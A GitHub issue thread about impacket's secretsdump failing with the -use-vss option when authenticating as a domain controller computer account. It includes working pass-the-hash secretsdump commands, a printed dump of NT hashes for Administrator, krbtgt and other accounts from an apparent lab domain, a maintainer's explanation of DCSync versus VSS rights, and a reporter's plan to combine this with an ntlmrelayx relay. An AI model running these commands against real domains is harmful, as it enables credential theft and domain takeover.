### ISSUE TITLE
Dump NTDS not working with vss option for computer account

### ISSUE THREAD

**Issue by mpgn** [SecureAuthCorp/impacket#1251]
### Configuration  
impacket version:  0.9.25
Python version:  3.8
Target OS:  Windows server 2016

### Debug Output With Command String  
```
┌──(mpgn㉿kali)-[~/impacket/examples]
└─$ impacket-secretsdump POUDLARD/dc01\$@192.168.133.157 -hashes 171d84d0f5b1f408a91b91decb64771f:171d84d0f5b1f408a91b91decb64771f -just-dc-ntlm         
Impacket v0.9.25.dev1+20220203.155819.ed7082cd - Copyright 2021 SecureAuth Corporation

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:29e686d307cc0f2ba1f35eafc00369b4:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:21e8da98d424f0636be5e82d2da6ca85:::
poudlard.wizard\ron:1601:aad3b435b51404eeaad3b435b51404ee:999e1c2a032ada29d812361249fb3c58:::
poudlard.wizard\rubeus:1602:aad3b435b51404eeaad3b435b51404ee:999e1c2a032ada29d812361249fb3c58:::
test1:1603:aad3b435b51404eeaad3b435b51404ee:999e1c2a032ada29d812361249fb3c58:::
poudlard.wizard\tom:1604:aad3b435b51404eeaad3b435b51404ee:999e1c2a032ada29d812361249fb3c58:::
adminlocal:1606:aad3b435b51404eeaad3b435b51404ee:999e1c2a032ada29d812361249fb3c58:::
poudlard.wizard\malfoy:1608:aad3b435b51404eeaad3b435b51404ee:999e1c2a032ada29d812361249fb3c58:::
poudlard.wizard\hermione:1609:aad3b435b51404eeaad3b435b51404ee:999e1c2a032ada29d812361249fb3c58:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:171d84d0f5b1f408a91b91decb64771f:::
ADCS$:1103:aad3b435b51404eeaad3b435b51404ee:1b236bf846295ce2b1c2cbe4a5a50bfb:::
SQL01$:1607:aad3b435b51404eeaad3b435b51404ee:c021ed371f1a486e77615dea68393bef:::
SAMTHEADMIN-98$:1610:aad3b435b51404eeaad3b435b51404ee:1e336bb56f6cc28763532ad3dee6606a:::
[*] Cleaning up... 
                                                                                                                         
┌──(mpgn㉿kali)-[~/impacket/examples]
└─$ impacket-secretsdump POUDLARD/dc01\$@192.168.133.157 -hashes 171d84d0f5b1f408a91b91decb64771f:171d84d0f5b1f408a91b91decb64771f -just-dc-ntlm -use-vss -debug
Impacket v0.9.25.dev1+20220203.155819.ed7082cd - Copyright 2021 SecureAuth Corporation

[+] Impacket Library Installation Path: /home/mpgn/.local/lib/python3.9/site-packages/impacket
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Searching for NTDS.dit
Traceback (most recent call last):
  File "/usr/share/doc/python3-impacket/examples/secretsdump.py", line 198, in dump
    NTDSFileName = self.__remoteOps.saveNTDS()
  File "/home/mpgn/.local/lib/python3.9/site-packages/impacket/examples/secretsdump.py", line 1003, in saveNTDS
    ans = rrp.hOpenLocalMachine(self.__rrp)
  File "/home/mpgn/.local/lib/python3.9/site-packages/impacket/dcerpc/v5/rrp.py", line 755, in hOpenLocalMachine
    return dce.request(request)
AttributeError: 'NoneType' object has no attribute 'request'
[-] 'NoneType' object has no attribute 'request'
[*] Cleaning up... 
                                                                                                            
```

### Additional context  
I try to dump the ntds with the option `-use-vss` but an error occur. Maybe it is not possible to dump ntds with vss and a computer account maybe this is a bug.

**Comment by jagotu** [comment]
For dumping using DRSUAPI, so-called DCSync rights are required, as it uses the protocol DCs use to synchronize between themselves.

For dumping using VSS, admin rights on the target DC are required - it just (somewhat crudely)  downloads the NTDS.DIT database file from the DC, using VSS to bypass the fact that the file is always opened and therefore locked. The required file operations can only be done by admins.

You're using a DC account, which has DCSync rights so DRSUAPI works, but doesn't have administrator rights so no VSS. As such, the only issue I see is the errors could be worded better and the script shouldn't crash, but getting some form of "access denied" is the expected result here.

**Comment by mpgn** [comment]
Excellent, thank you for the clarification !

**Comment by mpgn** [comment]
You may wondering why I try this. The initial idea was to be able to dump NTDS when using ntlmrelayx socks optio and proxychains.

If you want to dump the ntds when using a socks proxy, you need to use the method vss (because a connection is made to port 135 with method DRSUAPI) which works great.
Now imagine you are able to get a dc account on ntlmrelayx, it would have been nice to be able to dcsync the domain using this account :)
